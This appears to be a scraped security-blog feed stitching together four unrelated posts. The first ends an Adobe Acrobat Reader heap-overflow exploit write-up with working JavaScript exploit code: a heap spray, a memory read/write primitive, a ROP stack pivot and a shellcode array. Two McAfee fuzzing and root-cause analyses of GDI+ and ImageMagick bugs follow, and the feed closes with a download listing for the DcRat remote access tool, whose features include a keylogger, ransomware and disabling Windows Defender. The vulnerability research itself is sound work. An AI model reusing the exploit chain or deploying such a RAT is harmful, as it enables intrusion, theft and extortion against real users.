In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

Obtain pointers to the relevant modules to calculate their base addresses.
Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
Write the shellcode.
Call VirtualProtect to change the shellcode memory region permissions to allow execution.
Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

McAfee Blogs

Hardik Shah

28 June 2021 at 19:44

Consejos para protegerte de quienes intentan hackear tus correos electrónicos

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use different graphics functionality on video displays as well as printers. Windows applications don’t directly access graphics hardware such as device drivers, but they interact with GDI, which in turn then interacts with device drivers. In this way, there is an abstraction layer to Windows applications and a common set of APIs for everyone to use.

Because of its complex format, GDI+ has a known history of various vulnerabilities. We at McAfee continuously fuzz various open source and closed source software including windows GDI+. Over the last few years, we have reported various issues to Microsoft in various Windows components including GDI+ and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability. This issue was fixed in January 2021 as part of a Microsoft Patch.

What is WinAFL?

WinAFL is a Windows port of a popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL uses dynamic binary instrumentation using DynamoRIO and it requires a program called as a harness. A harness is nothing but a simple program which calls the APIs we want to fuzz.

A simple harness for this was already provided with WinAFL, we can enable “Image->GetThumbnailImage” code which was commented by default in the code. Following is the harness code to fuzz GDI+ image and GetThumbnailImage API:

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, this requires little user interaction, thus software which uses GDI+ and calls GetThumbnailImage API, is vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that we can use Google or GitHub in addition to further test corpus available from various software and public EMF files which were released for other vulnerabilities. We have generated a few test files by making changes to a sample code provided on Microsoft’s site which generates an EMF file with EMFPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected an initial corpus file, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 — gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We need to provide a function name to WinAFL. It will save the program state at the start of the function and take one input file from the corpus, mutate it, and feed it to the function.

It will monitor this for any new code paths or crashes. If it finds a new code path, it will consider the new file as an interesting test case and will add it to the queue for further mutation. If it finds any crashes, it will save the crashing file in crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program, collected, and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 —coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 — gdiplus_hardik.exe @@

Results:

We found a few crashes and after triaging unique crashes, and we found a crash in “gdiplus!BuiltLine::GetBaselineOffset” which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from a memory address pointed by edx+8. We can see it registers ebx, ecx and edx contains c0c0c0c0 which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out a root cause, we can use patch diffing—namely, we can use IDA BinDiff plugin to identify what changes have been made to patched file. If we are lucky, we can easily find the root cause by just looking at the code that was changed. So, we can generate an IDB file of patched and unpatched versions of gdiplus.dll and then run IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and this seems to be a destructor for BuiltLine Object :

We can also see that there are a few functions where the similarity score is < 1 and one such function is FullTextImager::BuildAllLines as shown below:

Now, just to confirm if this function is really the one which was patched, we can run our test program and POC in windbg and set a break point on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

Now, as a next step, we need to identify what has been changed in this function to fix this vulnerability. For that we can check flow graph of this function and we see something as follows. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side illustrates an unpatched dll while right side shows a patched dll:

Green indicates that the patched and unpatched blocks are same.
Yellow blocks indicate there has been some changes between unpatched and patched dlls.
Red blocks call out differences in the dlls.

If we zoom in on the yellow blocks we can see following:

We can note several changes. Few blocks are removed in the patched DLL, so patch diffing will alone will not be sufficient to identify the root cause of this issue. However, this presents valuable hints about where to look and what to look for when using other methods for debugging such as windbg. A few observations we can spot from the bindiff output above:

In the unpatched DLL, if we check carefully we can see that there is a call to “GetuntrimmedCharacterCount” function and later on there is another call to a function “SetSpan::SpanVector”
In the patched DLL, we can see that there is a call to “GetuntrimmedCharacterCount” where a return value stored inside EAX register is checked. If it’s zero, then control jumps to another location—a destructor for BuiltLine Object, this was newly added code in the patched DLL:

So we can assume that this is where the vulnerability is fixed. Now we need to figure out following:

Why our program is crashing with the provided POC file?
What field in the file is causing this crash?
What value of the field?
Which condition in program which is causing this crash?
How this was fixed?

EMF File Format:

EMF is also known as enhanced meta file format which is used to store graphical images device independently. An EMF file is consisting of various records which is of variable length. It can contain definition of various graphic object, commands for drawing and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consist of the following records:

EMF Header – This contains information about EMF structure.
EMF Records – This can be various variable length records, containing information about graphics properties, drawing order, and so forth.
EMF EOF Record – This is the last record in EMF file.

Detailed specifications of EMF file format can be seen at Microsoft site at following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are because of malformed or corrupt records. We need to figure out which record type is causing this crash. For this if we look at the call stack we can see following:

We can notice a call to function “gdiplus!GdipPlayMetafileRecordCallback”

By setting a breakpoint on this function and checking parameter, we can see following:

We can see that EDX contains some memory address and we can see that parameter given to this function are: 00x00401c,0x00000000 and 0x00000044.

Also, on checking the location pointed by EDX we can see following:

If we check our POC EMF file, we can see that this data belongs to file from offset: 0x15c:

By going through EMF specification and manually parsing the records, we can easily figure out that this is a “EmfPlusDrawString” record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches to a function “gdiplus!FullTextImager::BuildAllLines”. When we decompile this code, we can see something like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

Inside “Builtline::BuildAllLines” function, there is a while loop inside which the program allocates 0x60 bytes of memory. Then it calls the “Builtline::BuiltLine”
The “Builtline::BuiltLine” function moves data to the newly allocated memory and then it calls “BuiltLine::GetUntrimmedCharacterCount”.
The return value of “BuiltLine::GetUntrimmedCharacterCount” is added to loop counter, which is ECX. This process will be repeated until the loop counter (ECX) is < string length(EAX), which is 0x14 here.
The loop starts from 0, so it should terminate at 0x13 or it should terminate when the return value of “GetUntrimmedCharacterCount” is 0.
But in the vulnerable DLL, the program doesn’t terminate because of the way loop counter is increased. Here, “BuiltLine::GetUntrimmedCharacterCount” returns 0, which is added to Loop counter(ECX) and doesn’t increase ECX value. It allocates 0x60 bytes of memory and creates another line, corrupting the data that later leads the program to crash. The loop is executed for 21 times instead of 20.

In detail:

1. Inside “Builtline::BuildAllLines” memory will be allocated for 0x60 or 96 bytes, and in the debugger it looks as follows:

2. Then it calls “BuiltLine::BuiltLine” function and moves the data to newly allocated memory:

3. This happens in side a while loop and there is a function call to “BuiltLine::GetUntrimmedCharacterCount”.

4. Return value of “BuiltLine::GetUntrimmedCharacterCount” is stored in a location 0x12ff2ec. This value will be 1 as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines if ecx< eax. If true, it will continue loop, else it will jump to another location:

7. Now in the vulnerable version, loop doesn’t exist if the return value of “BuiltLine::GetUntrimmedCharacterCount” is 0, which means that this 0 will be added to ECX and which means ECX will not increase. So the loop will execute 1 more time with the “ECX” value of 0x13. Thus, this will lead to loop getting executed 21 times rather than 20 times. This is the root cause of the problem here.

Also after some debugging, we can figure out why EAX contains 14. It is read from the POC file at offset: 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches to “FullTextImager::Render” function corrupting the value of EAX because it reads the unused memory:

This will be passed as an argument to “FullTextImager::RenderLine” function:

Later, program will crash while trying to access this location.

Our program was crashing while processing EmfPlusDrawString record inside the EMF file while accessing an invalid memory location and processing string data field. Basically, the program was not verifying the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function and this resulted in taking a different program path that corrupted the register and various memory values, ultimately causing the crash.

How this issue was fixed?

As we have figured out by looking at patch diff above, a check was added which determined the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function.

If the retuned value is 0, then program xor’s EBX which contains counter and jump to a location which calls destructor for Builtline Object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend our users to apply proper updates and keep their Windows deployment current.

We at McAfee are continuously fuzzing various open source and closed source library and work with vendors to fix such issues by responsibly disclosing such issues to them giving them proper time to fix the issue and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blog.

Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

McAfee Blogs

Hardik Shah

30 June 2021 at 15:00

Introduction:

ImageMagick is a hugely popular open source software that is used in lot of systems around the world. It is available for the Windows, Linux, MacOS platforms as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has lot of configuration options which we can see by running following command:

$./configure –help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use following commands:

$CC=afl-gcc CXX=afl=g++ CFLAGS=”-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer” LDFLAGS=”-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer” ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would be include the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting corpus is to search on Google or GitHub. We can also use existing test corpus from various software. A good test corpus is available on the AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it will instrument each basic block so that it can trace the program execution path. It maintains a shared memory as a bitmap and it uses an algorithm to check new block hits. If a new block hit has been found, it will save this information to bitmap.

Now it may be possible that more than one input file from the corpus can trigger the same path, as we have collected sample files from various sources, we don’t have any information on what paths they will trigger at the runtime. If we use this corpus without removing such files, then we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> — magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized corpus, we can start fuzzing. To fuzz we need to use following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. In case we have multicore processors, we can run multiple instances of AFL, with one Master and n number of Slaves. Where n is the available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run master instances, we can use following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

We can run slave instances using following command:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this Fuzzing campaign, we found one crash related to an out of bound read inside a heap memory. We have reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has release a new build with version: 7.0.46 to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick with following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past allocated heap buffer and therefore ASAN caused this crash. This can atleast lead to a ImageMagick crash on the systems running vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

Image File Header (IFH) – Contains information such as file identifier, version, offset of IFD.
Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like colormap, page number, BitPerSample, FillOrder,
Bitmap data – Contains various image data like strips, tiles, etc.

We can tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see the following information with tiffinfo like width, height, sample per pixel, row per strip etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planer configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, program was crashing at function “PushQuantumPixel” in the following location in quantum-import.c line 256:

On checking “PushQuantumPixel” function in “MagickCore/quantum-import.c” we can see the following code at line #256 where program is crashing:

We can see following:

“pixels” seems to be a character array
inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of “pixels” which means that value is out of bound from the allocated heap memory.

Now we need to figure out following:

What is “pixels” and what data it contains?
Why it is crashing?
How this was fixed?

Finding root cause:

To start with, we can check “ReadTIFFImage” function in coders/tiff.c file and see that it allocates memory using a “AcquireQuantumMemory” function call, which appears as per the documentation mentioned here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case two parameters passed to this function are “extent” and “sizeof(*strip_pixels)”

We can see that “extent” is calculated as following in the code below:

There is a function TIFFStripSize(tiff) which returns size for a strip of data as mentioned in libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224 and we can also see that in the code mentioned above, “image->columns * sizeof(uint64)” is also added to extent, which results in 24 added to extent, so extent value becomes 248.

So, this extent value of 248 and sizeof(*strip_pixels) which is 1 is passed to “AcquireQuantumMemory” function and total memory of 248 bytes get allocated.

This is how memory is allocated.

“Strip_pixel” is pointer to newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain “0xbe” which is default for newly allocated memory by ASAN:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a “memset” call and this is assigned to a variable “p”, as mentioned in below image. Please also note that “p” will be used as a pointer to traverse this memory location going forward in the program:

Later on we see that there is a call to “TIFFReadEncodedPixels” which reads strip data from TIFF file and stores it into newly allocated buffer “strip_pixels” of 248 bytes (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we need to again refer to TIFF file structure. We can see that there is a tag called “StripOffsets” and its value is 8, which specifies the offset of strip data inside TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” is the actual data from the TIFF file from offset 8. This will be traversed through pointer “p”.

Inside “ReadTIFFImage” function there are two nested for loops.

The first “for loop” is responsible for iterating for “samples_per_pixel” time which is 3.
The second “for loop” is responsible for iterating the pixel data for “image->rows” times, which is 32. This second loop will be executed for 32 times or number of rows in the image irrespective of allocated buffer size .
Inside this second for loop, we can see something like this:

We can notice that “ImportQuantumPixel” function uses the “p” pointer to read the data from “strip_pixels” and after each call to “ImportQuantumPixel”, value of “p” will be increased by “stride”.

Here “stride” is calculated by calling function “TIFFVStripSize()” function which as per documentation returns the number of bytes in a strip with nrows rows of data. In this case it is 14. So, every time pointer “p” is incremented by “14” or “0xE” inside the second for loop.

If we print the image structure which is passed to “ImportQuantumPixels” function as parameter, we can see following:

Here we can notice that the columns value is 3, the rows value is 32 and depth is 9. If we check in the POC TIFF file, this has been taken from ImageWidth and ImageLength and BitsPerSample value:

Ultimately, control reaches to “ImportRGBQuantum” and then to the “PushQuantumPixel” function and one of the arguments to this function is the pixels data which is pointed by “p”. Remember that this points to the memory address which was previously allocated using the “AcquireQuantumMemory” function, and that its length is 248 byte and every time value of “p” is increased by 14.

The “PushQuantumPixel” function is used to read pixel data from “p” into the internal pixel data storage of ImageMagick. There is a for loop which is responsible for reading data from the provided pixels array of 248 bytes into a structure “quantum_Info”. This loop reads data from pixels incrementally and saves it in the “quantum_info->state.pixels” field.

The root cause here is that there are no proper bounds checks and the program tries to read data beyond the allocated buffer size on the heap, while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

The program allocates 248 bytes of memory to process strip data for image, a pointer “p” points to this memory.
Inside a for loop this pointer is increased by “14” or “0xE” for number of rows in the image, which in this case is 32.
Based on this calculation, 32*14=448 bytes or more amount of memory is required but only 248 in actual memory were allocated.
The program tries to read data assuming total memory is of 448+ bytes, but the fact that only 248 bytes are available causes an Out of Bound memory read issue.

How it was fixed?

If we check at the patch diff, we can see that the following changes were made to fix this issue:

Here the 2^nd argument to “AcquireQuantumMemory” is multiplied by 2 thus increasing the total amount of memory and preventing this Out of Bound read issue from heap memory. The total memory allocated is 496 bytes, 248*2=496 bytes, as we can see below:

Another issue with the fix:

A new version of ImageMagick 7.0.46 was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below, we can see that there was a call to memset which didn’t set the proper memory size to zero.

Memory was allocated extent*2*sizeof(*strip_pixels) but in this memset to 0 was only done for extent*sizeof(*strip_pixels). This means half of the memory was set to 0 and rest contained 0xbebebebe, which is by default for ASAN new memory allocation.

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing various image files requires deep understanding of various file formats and thus it is possible that something may not be exactly implemented or missed. This can lead to various vulnerabilities in such image processing software. Some of this vulnerability can lead to DoS and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure them. We work very closely with various vendors and do responsible disclosure. This shows McAfee’s commitment towards securing the software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate risk arriving from such threats.

We would like to thank and appreciate ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version to fix this issue.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blog.

DcRat - A Simple Remote Tool Written In C#

KitPloit - PenTest & Hacking Tools

Zion3R

12 July 2021 at 21:30

DcRat is a simple remote tool written in C#

Introduction

Features

TCP connection with certificate verification, stable and security
Server IP port can be archived through link
Multi-Server,multi-port support
Plugin system through Dll, which has strong expansibility
Super tiny client size (about 40~50K)
Data transform with msgpack (better than JSON and other formats)
Logging system recording all events

Functions

Remote shell
Remote desktop
Remote camera
Registry Editor
File management
Process management
Netstat
Remote recording
Process notification
Send file
Inject file
Download and Execute
Send notification
Chat
Open website
Modify wallpaper
Keylogger
File lookup
DDOS
Ransomware
Disable Windows Defender
Disable UAC
Password recovery
Open CD
Lock screen
Client shutdown/restart/upgrade/uninstall
System shutdown/restart/logout
Bypass Uac
Get computer information
Thumbnails
Auto task
Mutex
Process protection
Block client
Install with schtasks
etc

Deployment

Build：vs2019
Runtime：

Project	Runtime
Server	.NET Framework 4.61
Client and others	.NET Framework 4.0

Support

The following systems (32 and 64 bit) are supported
- Windows XP SP3
- Windows Server 2003
- Windows Vista
- Windows Server 2008
- Windows 7
- Windows Server 2012
- Windows 8/8.1
- Windows 10

TODO

Password recovery and other stealer (only chrome and edge are supported now)
Reverse Proxy
Hidden VNC
Hidden RDP
Hidden Browser
Client Map
Real time Microphone
Some fun function
Information Collection(Maybe with UI)
Support unicode in Remote Shell
Support Folder Download
Support more ways to install Clients
……

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.

Download

Press here to download the lastest release.

Attention

我（簞純）对您由使用或传播等由此软件引起的任何行为和/或损害不承担任何责任。您对使用此软件的任何行为承担全部责任，并承认此软件仅用于教育和研究目的。下载本软件或软件的源代码，您自动同意上述内容。
I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.

Thanks

SiMay - @koko
Quasar - @Quasar
